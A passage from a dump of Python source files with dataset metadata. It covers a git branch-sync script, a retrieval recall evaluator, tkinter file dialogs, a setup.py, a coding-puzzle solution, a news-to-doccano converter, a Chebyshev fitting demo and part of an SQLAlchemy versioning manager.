len(from_values) > 0 and len(to_values) > 0:\n                    frc = self.get_commit(from_values.pop())\n                    toc = self.get_commit(to_values.pop())\n                    if frc.title != toc.title or frc.author_date != toc.author_date:\n                        raise RuntimeError(f\"Unexpected differences between {frc} and {toc}\")\n                    from_commits.remove(frc.commit_hash)\n                    to_commits.remove(toc.commit_hash)\n                continue\n            for commit in from_values:\n                from_commits.remove(commit)\n            for commit in to_values:\n                to_commits.remove(commit)\n        return (from_commits, to_commits)\n\n    def cherry_pick_commits(self, from_branch: str, to_branch: str) -> None:\n        orig_branch = self.current_branch()\n        self.checkout(to_branch)\n        from_commits, to_commits = self.compute_branch_diffs(from_branch, to_branch)\n        if len(from_commits) == 0:\n            print(\"Nothing to do\")\n            self.checkout(orig_branch)\n            return\n        for commit in reversed(from_commits):\n            self.cherry_pick(commit)\n        self.checkout(orig_branch)\n\n    def push(self, branch: str) -> None:\n        self._run_git(\"push\", self.remote, branch)\n\n\nif __name__ == '__main__':\n    repo_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))\n    default_branch = 'master'\n    sync_branch = 'fbsync'\n    repo = GitRepo(repo_dir)\n    repo.cherry_pick_commits(sync_branch, default_branch)\n    repo.push(default_branch)\n","sub_path":".github/scripts/syncbranches.py","file_name":"syncbranches.py","file_ext":"py","file_size_in_byte":7055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"451990498","text":"import numpy as np\r\nimport pickle\r\nfrom loading_input_v3 import *\r\nfrom sklearn.neighbors import KDTree\r\n\r\ndef get_queries_dict(filename):\r\n\twith open(filename, 'rb') as handle:\r\n\t\tqueries = pickle.load(handle)\r\n\t\tprint(\"feature Loaded.\")\r\n\t\treturn queries\r\n\r\nDATABASE_PCAI_VECTORS_FILENAME = "database_pcai_feat_00441147.pickle"\r\nQUERY_PCAI_VECTORS_FILENAME = "query_pcai_feat_00441147.pickle"\r\n\r\nDATABASE_PC_VECTORS_FILENAME = "database_pc_feat_00441147.pickle"\r\nQUERY_PC_VECTORS_FILENAME = "query_pc_feat_00441147.pickle"\r\n\r\nDATABASE_IMG_VECTORS_FILENAME = "database_img_feat_00441147.pickle"\r\nQUERY_IMG_VECTORS_FILENAME = "query_img_feat_00441147.pickle"\r\n#result output\r\noutput_file = "result_img_trans_mono_left_00240080.txt"\r\n#load feature\r\nDATABASE_PCAI_VECTORS = get_queries_dict(DATABASE_PCAI_VECTORS_FILENAME)\r\nQUERY_PCAI_VECTORS = get_queries_dict(QUERY_PCAI_VECTORS_FILENAME)\r\n\r\nDATABASE_PC_VECTORS = get_queries_dict(DATABASE_PC_VECTORS_FILENAME)\r\nQUERY_PC_VECTORS = 
get_queries_dict(QUERY_PC_VECTORS_FILENAME)\r\n\r\nDATABASE_IMG_VECTORS = get_queries_dict(DATABASE_IMG_VECTORS_FILENAME)\r\nQUERY_IMG_VECTORS = get_queries_dict(QUERY_IMG_VECTORS_FILENAME)\r\n\r\n#load label\r\nQUERY_FILE= 'generate_queries_v3/stereo_centre_trans_RobotCar_ground_selected_oxford_evaluation_query.pickle'\r\nQUERY_SETS= get_sets_dict(QUERY_FILE)\r\n\r\nfor m in range(len(QUERY_SETS)):\r\n\tprint(len(QUERY_PCAI_VECTORS[m]))\r\n\tprint(len(QUERY_SETS[m]))\r\n\tif len(QUERY_SETS[m]) != len(QUERY_PCAI_VECTORS[m]):\r\n\t\tprint(\"not equal\")\r\n\r\n\r\ndef get_recall(m, n, DATABASE_VECTORS, QUERY_VECTORS):\r\n\tdatabase_output= DATABASE_VECTORS[m]\r\n\tqueries_output= QUERY_VECTORS[n]\r\n\r\n\tprint(len(queries_output))\r\n\tdatabase_nbrs = KDTree(database_output)\r\n\r\n\tnum_neighbors=25\r\n\trecall=[0]*num_neighbors\r\n\r\n\ttop1_similarity_score=[]\r\n\tone_percent_retrieved=0\r\n\tthreshold=max(int(round(len(database_output)/100.0)),1)\r\n\r\n\tnum_evaluated=0\r\n\tone_percent_recall_data = [0]*len(queries_output)\r\n\tfor i in range(len(queries_output)):\r\n\t\ttrue_neighbors= QUERY_SETS[n][i][m]\r\n\t\tif(len(true_neighbors)==0):\r\n\t\t\tcontinue\r\n\t\tnum_evaluated+=1\r\n\t\tdistances, indices = database_nbrs.query(np.array([queries_output[i]]),k=num_neighbors)\r\n\t\tfor j in range(len(indices[0])):\r\n\t\t\tif indices[0][j] in true_neighbors:\r\n\t\t\t\tif(j==0):\r\n\t\t\t\t\tsimilarity= np.dot(queries_output[i],database_output[indices[0][j]])\r\n\t\t\t\t\ttop1_similarity_score.append(similarity)\r\n\t\t\t\trecall[j]+=1\r\n\t\t\t\tbreak\r\n\t\t\t\t\r\n\t\tif len(list(set(indices[0][0:threshold]).intersection(set(true_neighbors))))>0:\r\n\t\t\tone_percent_retrieved+=1\r\n\t\t\tone_percent_recall_data[i]=1\r\n\t\t\t\r\n\t\t\t\r\n\tif num_evaluated == 0:\r\n\t\treturn None,None,None,None\r\n\tone_percent_recall=(one_percent_retrieved/float(num_evaluated))*100\r\n\trecall=(np.cumsum(recall)/float(num_evaluated))*100\r\n\tprint(recall)\r\n\t#print(np.mean(top1_similarity_score))\r\n\tprint(one_percent_recall)\r\n\treturn recall, top1_similarity_score, one_percent_recall,one_percent_recall_data\r\n\t\r\ndef main():\r\n\tfor i in range(len(DATABASE_PCAI_VECTORS)):\r\n\t\tprint(\"database feature shape\",i,DATABASE_PCAI_VECTORS[i].shape)\r\n\t\r\n\tfor i in range(len(QUERY_PCAI_VECTORS)):\r\n\t\tprint(\"query feature shape\",i,QUERY_PCAI_VECTORS[i].shape)\r\n\t\t\r\n\t#convert feature to target format\r\n\trecall_pcai= np.zeros(25)\r\n\trecall_pc= np.zeros(25)\r\n\trecall_img= np.zeros(25)\r\n\tcount = 0\r\n\tone_percent_recall_pcai=[]\r\n\tone_percent_recall_pc=[]\r\n\tone_percent_recall_img=[]\r\n\t\r\n\t\r\n\t#compute recall\r\n\tfor m in range(len(QUERY_SETS)):\r\n\t\tfor n in range(len(QUERY_SETS)):\r\n\t\t\tif(m==n):\r\n\t\t\t\tcontinue\r\n\t\t\tpair_recall_pcai, pair_similarity_pcai, pair_opr_pcai, one_per_data_pcai = get_recall(m, n, DATABASE_PCAI_VECTORS, QUERY_PCAI_VECTORS)\r\n\t\t\tpair_recall_pc, pair_similarity_pc, pair_opr_pc, one_per_data_pc = get_recall(m, n, DATABASE_PC_VECTORS, QUERY_PC_VECTORS)\r\n\t\t\tpair_recall_img, pair_similarity_img, pair_opr_img, one_per_data_img = get_recall(m, n, DATABASE_IMG_VECTORS, QUERY_IMG_VECTORS)\r\n\t\t\t\r\n\t\t\tif(pair_recall_pcai is 
None):\r\n\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\trecall_pcai+=np.array(pair_recall_pcai)\r\n\t\t\trecall_pc+=np.array(pair_recall_pc)\r\n\t\t\trecall_img+=np.array(pair_recall_img)\r\n\t\t\t\r\n\t\t\tcount+=1\r\n\t\t\tone_percent_recall_pcai.append(pair_opr_pcai)\r\n\t\t\tone_percent_recall_pc.append(pair_opr_pc)\r\n\t\t\tone_percent_recall_img.append(pair_opr_img)\r\n\r\n\trecall_pcai=recall_pcai/count\r\n\trecall_pc=recall_pc/count\r\n\trecall_img=recall_img/count\r\n\t\r\n\tprint(recall_pcai)\r\n\tprint(recall_pc)\r\n\tprint(recall_img)\r\n\t\r\n\tone_percent_recall_pcai= np.mean(one_percent_recall_pcai)\r\n\tone_percent_recall_pc= np.mean(one_percent_recall_pc)\r\n\tone_percent_recall_img= np.mean(one_percent_recall_img)\r\n\t\r\n\tprint(one_percent_recall_pcai)\r\n\tprint(one_percent_recall_pc)\r\n\tprint(one_percent_recall_img)\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n\t","sub_path":"compute_all_recall_stereo_centre_RobotCar_v3_trans_selected_ground.py","file_name":"compute_all_recall_stereo_centre_RobotCar_v3_trans_selected_ground.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"95651814","text":"#egversion = __doc__.split()[1]\r\n\r\n__all__ = [\r\n    'selectDirectory'\r\n    , 'selectOpenFile'\r\n    , 'selectSaveFile'\r\n    ]\r\n\r\nimport sys, os, string, types, pickle, traceback\r\n\r\nfrom tkinter import *\r\nimport tkinter.filedialog as tk_FileDialog\r\nfrom io import StringIO\r\n\r\ndef write(*args):\r\n    args = [str(arg) for arg in args]\r\n    args = \" \".join(args)\r\n    sys.stdout.write(args)\r\n    \r\ndef writeln(*args):\r\n    write(*args)\r\n    sys.stdout.write(\"\\n\")\r\n    \r\n    \r\ndef dq(s):\r\n    return '\"%s\"' % s\r\n\r\n#-------------------------------------------------------------------\r\n# selectDirectory\r\n#-------------------------------------------------------------------\r\ndef selectDirectory(msg=None\r\n    , title=None\r\n    , default=None\r\n    ):\r\n    \"\"\"\r\n    A dialog to get a directory name.\r\n    Note that the msg argument, if specified, is ignored.\r\n\r\n    Returns the name of a directory, or None if user chose to cancel.\r\n\r\n    If the \"default\" argument specifies a directory name, and that\r\n    directory exists, then the dialog box will start with that directory.\r\n    \"\"\"\r\n    title=getFileDialogTitle(msg,title) \r\n    boxRoot = Tk()\r\n    boxRoot.withdraw()\r\n    if not default: default = None\r\n    f = tk_FileDialog.askdirectory(\r\n        parent=boxRoot\r\n        , title=title\r\n        , initialdir=default\r\n        , initialfile=None\r\n        ) \r\n    boxRoot.destroy() \r\n    if not f: return None\r\n    return os.path.normpath(f)\r\n\r\n\r\n\r\n#-------------------------------------------------------------------\r\n# getFileDialogTitle\r\n#-------------------------------------------------------------------\r\ndef getFileDialogTitle(msg\r\n    , title\r\n    ):\r\n    if msg and title: return \"%s - %s\" % (title,msg)\r\n    if msg and not title: return str(msg)\r\n    if title and not msg: return str(title)\r\n    return None # no message and no title\r\n\r\n#-------------------------------------------------------------------\r\n# class FileTypeObject for use with fileOpenBox\r\n#-------------------------------------------------------------------\r\nclass FileTypeObject:\r\n    def __init__(self,filemask):\r\n        if len(filemask) == 0:\r\n            raise AssertionError('Filetype argument is empty.')\r\n        \r\n        self.masks = []\r\n        \r\n        if type(filemask) == type(\"abc\"): # a string\r\n            self.initializeFromString(filemask)\r\n        \r\n        elif 
type(filemask) == type([]): # a list\r\n if len(filemask) < 2:\r\n raise AssertionError('Invalid filemask.\\n'\r\n +'List contains less than 2 members: \"%s\"' % filemask)\r\n else:\r\n self.name = filemask[-1]\r\n self.masks = list(filemask[:-1] )\r\n else:\r\n raise AssertionError('Invalid filemask: \"%s\"' % filemask)\r\n\r\n def __eq__(self,other):\r\n if self.name == other.name: return True\r\n return False\r\n \r\n def add(self,other):\r\n for mask in other.masks:\r\n if mask in self.masks: pass\r\n else: self.masks.append(mask)\r\n\r\n def toTuple(self):\r\n return (self.name,tuple(self.masks))\r\n \r\n def isAll(self):\r\n if self.name == \"All files\": return True\r\n return False\r\n \r\n def initializeFromString(self, filemask):\r\n # remove everything except the extension from the filemask\r\n self.ext = os.path.splitext(filemask)[1]\r\n if self.ext == \"\" : self.ext = \".*\"\r\n if self.ext == \".\": self.ext = \".*\"\r\n self.name = self.getName()\r\n self.masks = [\"*\" + self.ext]\r\n \r\n def getName(self):\r\n e = self.ext\r\n if e == \".*\" : return \"All files\"\r\n if e == \".txt\": return \"Text files\"\r\n if e == \".py\" : return \"Python files\"\r\n if e == \".pyc\" : return \"Python files\"\r\n if e == \".xls\": return \"Excel files\"\r\n if e.startswith(\".\"): \r\n return e[1:].upper() + \" files\"\r\n return e.upper() + \" files\"\r\n\r\n\r\n#-------------------------------------------------------------------\r\n# selectOpenFile\r\n#-------------------------------------------------------------------\r\ndef selectOpenFile(msg=None\r\n , title=None\r\n , default=\"*\"\r\n , filetypes=None\r\n ):\r\n \"\"\"\r\n A dialog to get a file name.\r\n \r\n About the \"default\" argument\r\n ============================\r\n The \"default\" argument specifies a filepath that (normally)\r\n contains one or more wildcards.\r\n fileOpenBox will display only files that match the default filepath.\r\n If omitted, defaults to \"*\" (all files in the current directory).\r\n \r\n WINDOWS EXAMPLE::\r\n ...default=\"c:/myjunk/*.py\" \r\n will open in directory c:\\myjunk\\ and show all Python files.\r\n\r\n WINDOWS EXAMPLE::\r\n ...default=\"c:/myjunk/test*.py\" \r\n will open in directory c:\\myjunk\\ and show all Python files\r\n whose names begin with \"test\".\r\n \r\n \r\n Note that on Windows, fileOpenBox automatically changes the path\r\n separator to the Windows path separator (backslash).\r\n\r\n About the \"filetypes\" argument\r\n ==============================\r\n If specified, it should contain a list of items,\r\n where each item is either::\r\n - a string containing a filemask # e.g. 
\"*.txt\" \r\n - a list of strings, where all of the strings except the last one\r\n are filemasks (each beginning with \"*.\",\r\n such as \"*.txt\" for text files, \"*.py\" for Python files, etc.).\r\n and the last string contains a filetype description\r\n \r\n EXAMPLE::\r\n filetypes = [\"*.css\", [\"*.htm\", \"*.html\", \"HTML files\"] ]\r\n \r\n NOTE THAT\r\n =========\r\n\r\n If the filetypes list does not contain (\"All files\",\"*\"),\r\n it will be added.\r\n\r\n If the filetypes list does not contain a filemask that includes\r\n the extension of the \"default\" argument, it will be added.\r\n For example, if default=\"*abc.py\"\r\n and no filetypes argument was specified, then\r\n \"*.py\" will automatically be added to the filetypes argument.\r\n\r\n @rtype: string or None\r\n @return: the name of a file, or None if user chose to cancel\r\n\r\n @arg msg: the msg to be displayed.\r\n @arg title: the window title\r\n @arg default: filepath with wildcards\r\n @arg filetypes: filemasks that a user can choose, e.g. \"*.txt\"\r\n \"\"\"\r\n boxRoot = Tk()\r\n boxRoot.withdraw()\r\n\r\n initialbase, initialfile, initialdir, filetypes = fileSelectSetup(default,filetypes)\r\n\r\n #------------------------------------------------------------\r\n # if initialfile contains no wildcards; we don't want an\r\n # initial file. It won't be used anyway.\r\n # Also: if initialbase is simply \"*\", we don't want an\r\n # initialfile; it is not doing any useful work.\r\n #------------------------------------------------------------\r\n if (initialfile.find(\"*\") < 0) and (initialfile.find(\"?\") < 0):\r\n initialfile = None\r\n elif initialbase == \"*\":\r\n initialfile = None\r\n\r\n f = tk_FileDialog.askopenfilename(parent=boxRoot\r\n , title=getFileDialogTitle(msg,title) \r\n , initialdir=initialdir \r\n , initialfile=initialfile\r\n #, filetypes=[('All Files', '*.*')]\r\n #, filetypes=[('All Files', '*.*'), ('Text files', \"*.txt\")]\r\n )\r\n\r\n boxRoot.update()\r\n boxRoot.destroy() \r\n\r\n if not f: return None\r\n return os.path.normpath(f)\r\n\r\n\r\n#-------------------------------------------------------------------\r\n# selectSaveFile\r\n#-------------------------------------------------------------------\r\ndef selectSaveFile(msg=None\r\n , title=None\r\n , default=\"\"\r\n , filetypes=None\r\n ):\r\n \"\"\" \r\n A file to get the name of a file to save.\r\n Returns the name of a file, or None if user chose to cancel.\r\n\r\n The \"default\" argument should contain a filename (i.e. the\r\n current name of the file to be saved). 
It may also be empty,\r\n or contain a filemask that includes wildcards.\r\n \r\n The \"filetypes\" argument works like the \"filetypes\" argument to\r\n fileOpenBox.\r\n \"\"\"\r\n\r\n boxRoot = Tk()\r\n boxRoot.withdraw()\r\n\r\n initialbase, initialfile, initialdir, filetypes = fileSelectSetup(default,filetypes)\r\n \r\n f = tk_FileDialog.asksaveasfilename(parent=boxRoot\r\n , title=getFileDialogTitle(msg,title) \r\n , initialfile=initialfile\r\n , initialdir=initialdir\r\n #, filetypes=filetypes\r\n )\r\n boxRoot.update()\r\n boxRoot.destroy() \r\n if not f: return None\r\n return os.path.normpath(f)\r\n\r\n\r\n#-------------------------------------------------------------------\r\n#\r\n# fileSelectSetup\r\n#\r\n#-------------------------------------------------------------------\r\ndef fileSelectSetup(default,filetypes): \r\n if not default: default = os.path.join(\".\",\"*\")\r\n initialdir, initialfile = os.path.split(default)\r\n if not initialdir : initialdir = \".\"\r\n if not initialfile: initialfile = \"*\"\r\n initialbase, initialext = os.path.splitext(initialfile)\r\n initialFileTypeObject = FileTypeObject(initialfile)\r\n \r\n allFileTypeObject = FileTypeObject(\"*\")\r\n ALL_filetypes_was_specified = False \r\n\r\n if not filetypes: filetypes= []\r\n filetypeObjects = []\r\n\r\n for filemask in filetypes:\r\n fto = FileTypeObject(filemask)\r\n \r\n if fto.isAll(): \r\n ALL_filetypes_was_specified = True # remember this\r\n \r\n if fto == initialFileTypeObject:\r\n initialFileTypeObject.add(fto) # add fto to initialFileTypeObject\r\n else:\r\n filetypeObjects.append(fto)\r\n\r\n #------------------------------------------------------------------\r\n # make sure that the list of filetypes includes the ALL FILES type.\r\n #------------------------------------------------------------------\r\n if ALL_filetypes_was_specified: \r\n pass\r\n elif allFileTypeObject == initialFileTypeObject:\r\n pass\r\n else:\r\n filetypeObjects.insert(0,allFileTypeObject)\r\n #------------------------------------------------------------------\r\n # Make sure that the list includes the initialFileTypeObject\r\n # in the position in the list that will make it the default.\r\n # This changed between Python version 2.5 and 2.6\r\n #------------------------------------------------------------------ \r\n if len(filetypeObjects) == 0:\r\n filetypeObjects.append(initialFileTypeObject)\r\n\r\n if initialFileTypeObject in (filetypeObjects[0], filetypeObjects[-1]):\r\n pass\r\n else:\r\n filetypeObjects.insert(0,initialFileTypeObject) \r\n \r\n filetypes = [fto.toTuple() for fto in filetypeObjects]\r\n\r\n return initialbase, initialfile, initialdir, filetypes\r\n\r\n#-----------------------------------------------------------------------\r\n#\r\n# test/demo easygui\r\n#\r\n#-----------------------------------------------------------------------\r\ndef _dummy():\r\n pass\r\n\r\n","sub_path":"FileUtils.py","file_name":"FileUtils.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"608539995","text":"import io\nimport re\n\nfrom setuptools import find_packages, setup\n\nwith open('README.md', 'r') as fp:\n long_description = fp.read()\n\nwith io.open(\"pyrpiic/__init__.py\", \"rt\", encoding=\"utf8\") as fp:\n version = re.search(r'__version__ = \"(.*?)\"', fp.read()).group(1)\n (major_version, minor_version, revision) = version.split('.')\n\nsetup(\n name='PyRPIIC',\n version=version,\n description='Python RPI 
interface to low-level ICs',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='Samtec - ASH',\n author_email='samtec-ash@samtec.com',\n url='https://github.com/Samtec-ASH/pyrpiic',\n packages=find_packages(),\n python_requires='>=3.6'\n)\n","sub_path":"pypi_install_script/PyRPIIC-0.0.4.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"85790420","text":"#기둥과 보 설치\ndef possible(result):\n ans = True\n for x,y,a in result:\n if a == 0: #기둥인 경우\n if y == 0 or [x-1,y,1] in result or [x,y,1] in result or [x,y-1,0] in result:\n ans = True\n else:\n ans = False\n print(x,y,a)\n break\n elif a == 1: #보인 경우\n if [x,y-1,0] in result or [x+1,y-1,0] in result or ([x-1,y,1] in result and [x+1,y,1] in result):\n ans = True\n else:\n ans = False\n print(x, y, a)\n break\n return ans\n\n\ndef solution(n, build_frame):\n result = []\n for x,y,a,b in build_frame:\n tmp = [x, y, a]\n if b == 1: #설치인 경우\n result.append(tmp) #일단 설치\n if possible(result) == False: #설치된 것이 가능한 구조인지 판단\n result.remove(tmp) #불가능하다면 제거\n if b== 0: #삭제인 경우\n result.remove(tmp)\n if possible(result) == False:\n result.append(tmp)\n\n result = sorted(result, key=lambda x : (x[0], x[1]))\n return result\n\nprint(possible([[0,0,0],[0,1,1],[1,1,1],[2,0,0]]))\nprint(solution(5, [[1,0,0,1], [1,1,1,1], [2,1,0,1], [2,2,1,1], [5,0,0,1], [5,1,0,1], [4,2,1,1], [3,2,1,1]]))\nprint(solution(5, [[0,0,0,1], [2,0,0,1], [4,0,0,1], [0,1,1,1], [1,1,1,1,], [2,1,1,1], [3,1,1,1], [2,0,0,0], [1,1,1,0], [2,2,0,1]]))","sub_path":"구현/기둥과 보 설치(HHJ).py","file_name":"기둥과 보 설치(HHJ).py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"242879862","text":"import json\nimport os\nimport pickle as pkl\nimport shutil\nimport zipfile\nfrom datetime import datetime\nfrom typing import Optional\n\nfrom newsplease import NewsArticle\nfrom tqdm import tqdm\n\nfrom settings import PROJECT_PATH\n\nTEXTS_PATH = os.path.join(PROJECT_PATH, 'data', 'texts')\nUNZIPPED_DESTINATION = \"unzipped\"\nDEST_ABS_PATH = os.path.join(TEXTS_PATH, UNZIPPED_DESTINATION)\n\n\ndef datetime_to_str(date: Optional[datetime]) -> Optional[str]:\n return date.strftime(\"%m/%d/%Y, %H:%M:%S\") if date else \"\"\n\n\ndef read_single_article_group(path: str) -> NewsArticle.NewsArticle:\n \"\"\"\n Read NewsArticle object from dumped pickle file\n :param path: path to pickle\n :return: NewsArticle object\n \"\"\"\n try:\n with open(path, 'rb') as fp:\n article = pkl.load(fp)\n return article\n except (OSError, IOError) as _:\n print(\"Could not read \", path, \" Skipping\")\n\n\ndef restructurize_article_object(article_object: NewsArticle.NewsArticle, month: str,\n group_number: str) -> Optional[dict]:\n \"\"\"\n Takes the NewsArticle object and converts it to doccano-compatibile JSON Lite record.\n Namely, \"text\" key must contain text of article and \"meta\" anything we want to attach to a\n record\n :param article_object: previously read NewsArticle object\n :param month: currently processed month that will be attached to metadata\n :param group_number: id within given month, also attached to metadata\n :return: dict, restructurised article_object\n \"\"\"\n data_dict = article_object.get_dict()\n article_text = data_dict.pop('text')\n\n # sometimes a page was unavailable or link was no longer valid and in result, text is None.\n # 
some of these pages are available now but they constitute very small subset (ca.\n # 2300/65000) are I decided to just skip them\n if not article_text:\n return None\n\n meta_dict = {\n 'date_publish': datetime_to_str(data_dict['date_publish']),\n 'date_download': datetime_to_str(data_dict['date_download']),\n 'date_modify': datetime_to_str(data_dict['date_modify']),\n 'month': month,\n 'id': group_number,\n 'url': data_dict['url'],\n 'source_domain': data_dict['source_domain'],\n 'title': data_dict['title']\n }\n\n return {'text': article_text, 'meta': meta_dict}\n\n\ndef unzip_articles_text(destination=DEST_ABS_PATH, forced=False):\n if os.path.exists(destination):\n if forced:\n shutil.rmtree(destination)\n else:\n print(\"Nothing to be done. Destination seems populated\")\n return\n\n for _, _, files in os.walk(TEXTS_PATH):\n for month in tqdm(files, desc=\"Unzipping text articles\"):\n month_absolute_path = os.path.join(TEXTS_PATH, month)\n with zipfile.ZipFile(month_absolute_path, 'r') as fp:\n fp.extractall(destination)\n\n\ndef prepare_doccano_json(destination_filepath=\"output.json\"):\n failure_number = 0\n\n with open(destination_filepath, 'w') as fp:\n for _, subfolders, _ in os.walk(DEST_ABS_PATH):\n for month in sorted(subfolders):\n month_destination = os.path.join(DEST_ABS_PATH, month)\n for _, _, groups in os.walk(month_destination):\n for article_group in tqdm(groups, desc=\"Packing month \" + month):\n article_path = os.path.join(month_destination, article_group)\n art_obj = read_single_article_group(article_path)\n doccano_json_record = restructurize_article_object(art_obj, month,\n article_group)\n if not doccano_json_record:\n failure_number += 1\n continue\n json.dump(doccano_json_record, fp)\n fp.write(\"\\n\") # doccano requires each record be separated by line\n print(\"Done with \" + str(failure_number) + \" failures\")\n\n\nif __name__ == \"__main__\":\n unzip_articles_text(forced=True)\n prepare_doccano_json()\n","sub_path":"src/data/labeling_preparation.py","file_name":"labeling_preparation.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"94542053","text":"import numpy as np\nfrom numpy.polynomial.chebyshev import Chebyshev, chebval\nimport matplotlib.pyplot as plt\n\n#1st example\n\nnp.random.seed(0)\n\nx = np.linspace(-1, 1, 2000)\ny = np.cos(x) + 0.3*np.random.rand(2000)\np = np.polynomial.Chebyshev.fit(x, y, 90)\n\nt = np.linspace(-1, 1, 200)\nplt.plot(x, y, 'r.')\nplt.plot(t, p(t), 'k-', lw=3)\nplt.savefig(\"random.png\")\nplt.close()\n\n# 2nd example\n\nx = np.arange(0.5, 1, 1e-6)\ny = np.log10(x)\n\nfit = Chebyshev.fit(x, y, 4)\n\nplt.plot(x, y)\nplt.plot(x, fit(x), label = \"Chebyshev 4th Order Fit\", ls ='--')\nplt.legend()\nplt.savefig(\"cheby_fit.png\")\n","sub_path":"tutorial_5/chebyshev.py","file_name":"chebyshev.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"130170480","text":"from contextlib import contextmanager\nfrom inflection import underscore, pluralize\nfrom copy import copy\nimport sqlalchemy as sa\nfrom sqlalchemy.orm.collections import attribute_mapped_collection\nfrom sqlalchemy.ext.associationproxy import association_proxy\nfrom sqlalchemy_utils.functions import (\n declarative_base, is_auto_assigned_date_column\n)\nfrom sqlalchemy_utils.types import TSVectorType\nfrom .fetcher import SubqueryFetcher, ValidityFetcher\nfrom 
.model_builder import ModelBuilder\nfrom .table_builder import TableBuilder\nfrom .relationship_builder import RelationshipBuilder\nfrom .transaction_log import (\n TransactionLogBase,\n TransactionChangesBase,\n TransactionMetaBase\n)\nfrom .unit_of_work import UnitOfWork\n\n\nclass VersioningManager(object):\n \"\"\"\n VersioningManager delegates versioning configuration operations to builder\n classes and the actual versioning to UnitOfWork class. Manager contains\n configuration options that act as defaults for all versioned classes.\n \"\"\"\n\n def __init__(\n self,\n unit_of_work_cls=UnitOfWork,\n options={}\n ):\n self.uow = unit_of_work_cls(self)\n self.reset()\n self.options = {\n 'versioning': True,\n 'base_classes': None,\n 'table_name': '%s_history',\n 'exclude': [],\n 'include': [],\n 'transaction_log_base': TransactionLogBase,\n 'transaction_column_name': 'transaction_id',\n 'end_transaction_column_name': 'end_transaction_id',\n 'operation_type_column_name': 'operation_type',\n 'relation_naming_function': lambda a: pluralize(underscore(a)),\n 'strategy': 'validity',\n 'store_data_at_delete': True,\n 'track_property_modifications': False,\n 'modified_flag_suffix': '_mod'\n }\n self.options.update(options)\n\n def fetcher(self, obj):\n if self.option(obj, 'strategy') == 'subquery':\n return SubqueryFetcher(self)\n else:\n return ValidityFetcher(self)\n\n def reset(self):\n \"\"\"\n Resets this manager's internal state.\n\n This method should be used in test cases that create models on the fly.\n Otherwise history_class_map and some other variables would be polluted\n by no more used model classes.\n \"\"\"\n self.tables = {}\n self.pending_classes = []\n self.association_tables = set([])\n self.association_history_tables = set([])\n self.history_class_map = {}\n self.uow.reset()\n\n self.metadata = None\n\n @contextmanager\n def tx_context(self, **tx_context):\n \"\"\"\n Assigns values for current transaction context. When committing\n transaction these values are assigned to transaction object attributes.\n\n :param tx_context: dictionary containing TransactionLog object\n attribute names and values\n \"\"\"\n old_tx_context = self.uow.tx_context\n self.uow.tx_context = tx_context\n yield\n self.uow.tx_context = old_tx_context\n\n @contextmanager\n def tx_meta(self, **tx_meta):\n \"\"\"\n Assigns values for current transaction meta. 
When committing\n transaction new TransactionMeta records are created for each key-value\n pair.\n\n :param tx_context:\n dictionary containing key-value meta attribute pairs.\n \"\"\"\n old_tx_meta = self.uow.tx_meta\n self.uow.tx_meta = tx_meta\n yield\n self.uow.tx_meta = old_tx_meta\n\n def transaction_log_factory(self):\n \"\"\"\n Creates TransactionLog class.\n \"\"\"\n class TransactionLog(\n self.declarative_base,\n self.options['transaction_log_base']\n ):\n __tablename__ = 'transaction_log'\n manager = self\n\n return TransactionLog\n\n def create_transaction_log(self):\n \"\"\"\n Creates TransactionLog class but only if it doesn't already exist in\n declarative model registry.\n \"\"\"\n if 'TransactionLog' not in self.declarative_base._decl_class_registry:\n return self.transaction_log_factory()\n return self.declarative_base._decl_class_registry['TransactionLog']\n\n def transaction_changes_factory(self):\n \"\"\"\n Creates TransactionChanges class.\n \"\"\"\n class TransactionChanges(\n self.declarative_base,\n TransactionChangesBase\n ):\n __tablename__ = 'transaction_changes'\n\n TransactionChanges.transaction_log = sa.orm.relationship(\n self.transaction_log_cls,\n backref=sa.orm.backref(\n 'changes',\n ),\n primaryjoin=(\n '%s.id == TransactionChanges.transaction_id' %\n self.transaction_log_cls.__name__\n ),\n foreign_keys=[TransactionChanges.transaction_id]\n )\n return TransactionChanges\n\n def create_transaction_changes(self):\n \"\"\"\n Creates TransactionChanges class but only if it doesn't already exist\n in declarative model registry.\n \"\"\"\n if (\n 'TransactionChanges' not in\n self.declarative_base._decl_class_registry\n ):\n return self.transaction_changes_factory()\n return self.declarative_base._decl_class_registry['TransactionChanges']\n\n def transaction_meta_factory(self):\n \"\"\"\n Creates TransactionMeta class.\n \"\"\"\n class TransactionMeta(\n self.declarative_base,\n TransactionMetaBase\n ):\n __tablename__ = 'transaction_meta'\n\n TransactionMeta.transaction_log = sa.orm.relationship(\n self.transaction_log_cls,\n backref=sa.orm.backref(\n 'meta_relation',\n collection_class=attribute_mapped_collection('key')\n ),\n primaryjoin=(\n '%s.id == TransactionMeta.transaction_id' %\n self.transaction_log_cls.__name__\n ),\n foreign_keys=[TransactionMeta.transaction_id]\n )\n\n self.transaction_log_cls.meta = association_proxy(\n 'meta_relation',\n 'value',\n creator=lambda key, value: TransactionMeta(key=key, value=value)\n )\n\n return TransactionMeta\n\n def create_transaction_meta(self):\n \"\"\"\n Creates TransactionMeta class but only if it doesn't already exist\n in declarative model registry.\n \"\"\"\n if (\n 'TransactionMeta' not in\n self.declarative_base._decl_class_registry\n ):\n return self.transaction_meta_factory()\n return self.declarative_base._decl_class_registry['TransactionMeta']\n\n def build_tables(self):\n \"\"\"\n Build tables for history models based on classes that were collected\n during class instrumentation process.\n 